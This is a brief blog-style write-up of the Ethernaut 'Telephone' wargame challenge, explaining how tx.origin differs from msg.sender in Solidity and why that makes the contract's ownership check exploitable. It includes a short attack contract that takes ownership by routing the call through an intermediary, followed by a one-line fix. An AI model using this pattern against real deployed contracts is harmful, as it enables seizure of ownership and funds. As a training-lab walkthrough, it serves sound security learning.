Ethernaut Challenge 4 Telephone

Yong kang Chia
1 min readJul 20, 2022

The key ideas are:

  1. tx. origin is a global variable in Solidity which returns the address of the account that sent the transaction
  • tx.origin (address): sender of the transaction (full call chain)
  • msg.sender (address): sender of the message (current call)
  1. The exploit happens in the line
if (tx.origin != msg.sender) {
owner = _owner;
}

This means that if the attacker contract initiates the transaction, but forwards the attack call to another contract that has a method that changeOwner() that calls the Telephone contract, the owner would be changed.

  1. Normal Scenario

Alice (EOA) call directly Telephone.changeOwner(Bob)

  • tx.origin: Alice address
  • msg.sender: Alice address
  1. Attack Scenario

Alice (EOA) calls a smart contract AttackTelphone.attack(Bob) that calls Telephone.changeOwner(Bob)

Since the address that initiates the transaction is different from the address that calls changeOwner, the exploit happens.

Solution Code

abstract contract Telephone {
function changeOwner(address _owner) public virtual;
}
contract AttackTelephone { Telephone myContract; function attack(address telephoneContract, address newOwner) public {
myContract = Telephone(telephoneContract);
myContract.changeOwner(newOwner);
}
}

A better approach would be to store the owner as a private variable and check if the sender is the owner.

--

--

Yong kang Chia

Blockchain Developer. Chainlink Ex Spartan Group, Ex Netherminds